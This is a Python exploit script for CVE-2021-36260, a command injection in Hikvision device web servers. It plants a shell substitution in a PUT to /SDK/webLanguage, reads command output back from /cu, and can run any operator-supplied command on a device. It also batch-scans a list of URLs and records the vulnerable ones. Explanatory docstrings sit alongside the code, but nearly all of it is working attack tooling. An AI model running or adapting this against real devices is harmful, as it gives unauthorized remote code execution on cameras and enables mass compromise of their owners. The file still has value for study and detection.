CVE-2021-36260.py
# -*- coding: utf-8 -*-
import argparse
import time
import requests
from pyfiglet import Figlet
# ANSI SGR escape sequences; each one is prepended to a console message.
RED = "\x1b[1;91m"    # error lines (bad host, connection failure, failed command)
BLUE = "\x1b[1;94m"   # "not vulnerable" result line
GREEN = "\x1b[1;32m"  # "verified exploitable" result line
BOLD = "\x1b[1m"      # not referenced anywhere in this listing
ENDC = "\x1b[0m"      # resets all attributes
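def check_host(host):
    """Report whether *host* is written as an absolute http(s) URL.

    check() and cmd() derive the ``host:port`` pair with ``split('//')``,
    so a value without a ``scheme://`` prefix has to be rejected here
    rather than fail later with an ``IndexError``.

    Args:
        host: Target string taken from ``-u`` or from one line of the
            ``-f`` file.

    Returns:
        True when *host* starts with ``http://`` or ``https://``;
        otherwise an error line is printed and False is returned.
    """
    # A bare "http" prefix test also accepted inputs such as "httpfoo" or
    # "http:/x", which contain no "//" separator for the callers to split on.
    if host.startswith(("http://", "https://")):
        return True
    print(RED + '[x] ERROR: Host "{}" should start with http or https\n'.format(host) + ENDC)
    return False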
def check(origin_url):
    """Probe *origin_url* for CVE-2021-36260 by writing a marker file.

    CVE-2021-36260 is a command injection in the web server of affected
    Hikvision products. The probe is not passive: it sends a PUT to
    ``/SDK/webLanguage`` whose ``<language>`` element holds a shell
    substitution that creates an empty file ``webLib/cu``, then requests
    ``/cu``. An HTTP 200 on that second request is taken as proof that the
    substitution ran. Nothing in this function removes the marker file.

    The same request pair is what a device, proxy or network log would
    show: a PUT to ``/SDK/webLanguage`` with ``$(`` inside ``<language>``,
    followed by a GET for ``/cu``.

    Args:
        origin_url: Base URL of the device, ``scheme://host[:port]``.

    Returns:
        True if ``/cu`` answered 200, False for any other status, and None
        (after printing an error) if anything inside the request block
        raised.
    """
    authority = origin_url.split('//')[1]
    parts = authority.split(':')
    host = parts[0]
    # No explicit port in the URL: the Host header falls back to 80.
    port = parts[1] if len(parts) > 1 else 80
    request_headers = {
        "host": '{}:{}'.format(host, port),
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
    }
    body = '<?xml version="1.0" encoding="UTF-8"?><language>$(>webLib/cu)</language>'
    try:
        # Only the PUT sets timeout/verify; the GET runs with requests' defaults.
        requests.put(url=origin_url + '/SDK/webLanguage', headers=request_headers, data=body, timeout=3, verify=False)
        marker = requests.get(origin_url + '/cu')
        if marker.status_code != 200:
            print(BLUE + f'[+] Remote is not vulnerable (Code: {marker.status_code})\n')
            return False
        print(GREEN + f'[!] {authority} is verified exploitable\n')
        return True
    except BaseException:
        # Every failure in the block above, including an interrupt, is
        # reported as a connection error and the function returns None.
        print(RED + '[-]Cannot connect to ' + authority + '\n')
def cmd(origin_url, cmd):
    """Send *cmd* through the CVE-2021-36260 injection and print its output.

    *cmd* is placed unescaped inside the ``$(...)`` substitution of the
    ``<language>`` element sent to ``/SDK/webLanguage``; its standard output
    is redirected to ``webLib/cu`` and read back with a GET for ``/cu``.
    The file therefore holds the output of the most recent call, and nothing
    here removes it. On the wire this is the same PUT/GET pair that check()
    produces, with the command text visible in the PUT body.

    Args:
        origin_url: Base URL of the device, ``scheme://host:port``. Unlike
            check(), there is no default port: a URL without ``:port``
            raises ``IndexError``.
        cmd: Command string inserted into the request body.

    Returns:
        None. The response text, or an error line, is printed.
    """
    authority = origin_url.split('//')[1]
    fields = authority.split(':')
    host = fields[0]
    port = fields[1]
    request_headers = {
        "host": '{}:{}'.format(host, port),
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
    }
    body = '<?xml version="1.0" encoding="UTF-8"?>' + '<language>$({}>webLib/cu)</language>'.format(cmd)
    try:
        # Only the PUT sets timeout/verify; the GET runs with requests' defaults.
        requests.put(url=origin_url + '/SDK/webLanguage', headers=request_headers, data=body, timeout=3, verify=False)
        reply = requests.get(origin_url + '/cu')
        if reply is not None and reply.status_code == 200:
            print(reply.text)
        else:
            print(RED + f'[!] Error execute cmd "{cmd}"\n')
    except BaseException:
        # Every failure in the block above, including an interrupt, is
        # reported as a connection error.
        print(RED + '[-]Cannot connect to ' + authority + '\n')
def main():
    """Parse the command line and dispatch to check() or cmd().

    With ``-u`` and a URL accepted by check_host(), ``--check`` runs the
    probe and ``--cmd`` runs a command; ``--check`` wins when both are given.
    The ``-f`` branch is reached only when ``-u`` is absent or rejected: each
    line of the file that passes check_host() is probed with check(), which
    writes its marker file to every such device, and URLs for which check()
    returned True are appended to ``Exist.txt`` in the working directory.
    """
    f = Figlet(width=2000)
    print(f.renderText("Cuerz"))
    parser = argparse.ArgumentParser(description='CVE-2021-36260')
    # Printed on every run, before the arguments are parsed.
    print('Example: CVE-2021-36260.py -u http://192.168.1.1:8080 --check')
    parser.add_argument("-u", "--url", help='Start scanning url')
    parser.add_argument("-f", "--file", help='read the url from the file')
    parser.add_argument("--check", required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    args = parser.parse_args()
    # Single-target mode; with neither --check nor --cmd nothing is sent.
    if args.url and check_host(args.url):
        if args.check:
            check(args.url)
        elif args.cmd:
            cmd(args.url, args.cmd)
    # Batch mode: one URL per line.
    elif args.file:
        # NOTE(review): rebinds f (the Figlet object above); this handle is
        # never closed.
        f = open(args.file, "r")
        # NOTE(review): `all` shadows the builtin inside this function.
        all = f.readlines()
        for i in all:
            url = i.strip()
            if check_host(url):
                if check(url):
                    # 'a+' appends, so results from earlier runs are kept.
                    with open('Exist.txt', 'a+') as fp:
                        fp.write(url + '\n')
                        # NOTE(review): indentation was lost in this listing;
                        # the nesting level of this pause is assumed - confirm
                        # against the original file.
                        time.sleep(0.2)
# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()